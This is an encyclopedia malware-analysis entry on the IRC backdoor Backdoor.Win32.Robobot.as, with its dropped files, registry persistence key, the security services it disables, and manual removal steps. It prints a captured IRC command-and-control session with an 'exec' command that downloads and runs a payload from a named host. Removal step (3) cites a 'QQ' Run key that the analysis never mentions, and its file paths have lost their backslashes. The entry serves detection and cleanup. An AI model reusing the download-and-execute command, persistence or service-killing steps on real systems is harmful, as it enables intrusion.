Backdoor.Win32.Robobot.as

王朝百科·作者佚名 2010-02-19

宽屏版字体: 小|中|大|超大

病毒名称： Backdoor.Win32.Robobot.as

病毒类型：后门类

文件 MD5： 336E561DCDC23C4BD447394AB4DFC71D

公开范围：完全公开

危害等级： 4

文件长度：脱壳前 29,184 字节，脱壳后88,576 字节

感染系统： windows 9X以上版本

开发工具： Microsoft Visual C++ 7.0

加壳工具： UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

病毒描述：

该病毒运行后，连接网络下载病毒体到本机运行。添加注册表自动运行项以随系统引导病毒体。病毒运行后监听网络，等待接收指令。受感染用户可能会被利用进行各种恶操作。

行为分析：

1 、衍生病毒文件：

%WinDir%systemsmss.exe

%Documents and Settings% 当前用户名

Local SettingsTemp2exinjs.aa.exe

2 、新建下列册表键值：

HKEY_LOCAL_MACHINESOFTWAREMicrosoft

WindowsCurrentVersionRun.nvsvc

Value: String: "%WinDirsystemsmss.exe /w"

3 、连接下列地址下载病毒体：

ads6.opernuz.com（66.197.23*.3*） /up/injs.aa.exe

4、连接的 IRC 服务器地址：

numegaserver （66.7.2*0.24*）

5、连接 IRC 服务器后的交互如下：

NICK jfac-1_9127_1268

USER jfac-1_9127_1268

"jfac-1_9127_1268"

"in.pharmlod.com"

:jfac-1_9127_1268

:numegaserver 001

jfac-1_9127_1268

:Welcome to the SOMEnet IRC Network

jfac-1_9127_1268!~jfac-1_91@222.171.7.213

:numegaserver 002 jfac-1_9127_1268

:Your host is numegaserver, running version

ircd(Bahamut-1.4.35)-1.1(01)-02

:numegaserver 003 jfac-1_9127_1268

:This server was created Thu Feb 8 2007

at 15:11:12 UTC

:numegaserver 004

jfac-1_9127_1268

numegaserver ircd

(Bahamut-1.4.35)-1.1(01)-

02 oOiwscrRkKnfydaAbgheFjH

biklLmMnoprRstvc7BeEwxX

:numegaserver 005

jfac-1_9127_1268

NOQUIT WATCH=128 SAFELIST MODES=6

MAXCHANNELS=20 MAXBANS=100

NICKLEN=30 CHANNELLEN=32

TOPICLEN=307 KICKLEN=307

CHANTYPES=# PREFIX=(ov)@+

STATUSMSG=@+ NETWORK=SOMEnet

SILENCE=10 EXCEPTS

CHARSET=ascii

CHANMODES=bBeEX,k,l,7chiLmMnOprRstwx

CODEPAGES 8BNICKS=YES

MANICKS=YES MAWNICKS=YES

8BNCI=YES 8BCNCI=YES

NICKIDEN :are available

on this server

// 服务器返回信息

:numegaserver 251 jfac-1_9127_1268

:There are 28 users and 0 invisible

on 1 servers

:numegaserver 255 jfac-1_9127_1268

:I have 28 clients and 0 servers

:numegaserver 265 jfac-1_9127_1268

:Current local users: 28 Max: 39

:numegaserver 266 jfac-1_9127_1268

:Current global users: 28 Max: 39

:numegaserver 422 jfac-1_9127_1268

:MOTD File is missing

:jfac-1_9127_1268 MODE jfac-1_9127_1268

:+i

// 下载文件

:numegaserver 700

jfac-1_9127_1268 ISO8859-5

:is now your translation scheme

:inj1!~devel@66.7.200.245 PRIVMSG

jfac-1_9127_1268 :exec

http://ads6.opernuz.com/up

/injs.aa.exe?jfac-1_9127_1268

injs.aa.exe 1268

// 保持连接

PING :numegaserver

PONG :PING :numegaserver

PONG :

6、此文件用来监听网络：

%Documents and Settings% 当前用户名

Local SettingsTemp2exinjs.aa.exe

7 、病毒可能会修改下列注册表键值以穿过 Windows 防火墙：

HKLMSYSTEMCurrentControlSet

ServicesSharedAccessParameters

FirewallPolicyStandardProfile

AuthorizedApplicationsList',键值:0

8 、病毒试图关闭或停止下列安全服务：

KAVPersonal50

Wuauserv

Navaps

Symantec Core LC

SAVScan

Kavsvc

Wscsvc

注： % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:WinntSystem32 ， windows95/98/me 中默认的安装路径是 C:WindowsSystem ， windowsXP 中默认的安装路径是 C:WindowsSystem32 。

清除方案：

1 、使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 使用安天木马防线断开网络，结束病毒进程：

%WinDir%systemsmss.exe

%Documents and Settings% 当前用户名

Local SettingsTemp2exinjs.aa.exe

(2) 删除并恢复病毒添加与修改的注册表键值：

HKEY_LOCAL_MACHINESOFTWAREMicrosoft

WindowsCurrentVersionRun.nvsvc

Value: String: "%WinDirsystem

smss.exe /w"

(3)恢复病毒修改的注册表项目，删除病毒添加的注册表项。

HKEY_LOCAL_MACHINESOFTWAREMicrosoft

WindowsCurrentVersionRun

键值 : 字串: " QQ " = " %WINDIR%QQ.exe "

(4) 删除病毒释放文件：

%WinDir%systemsmss.exe

%Documents and Settings% 当前用户名

Local SettingsTemp2exinjs.aa.exe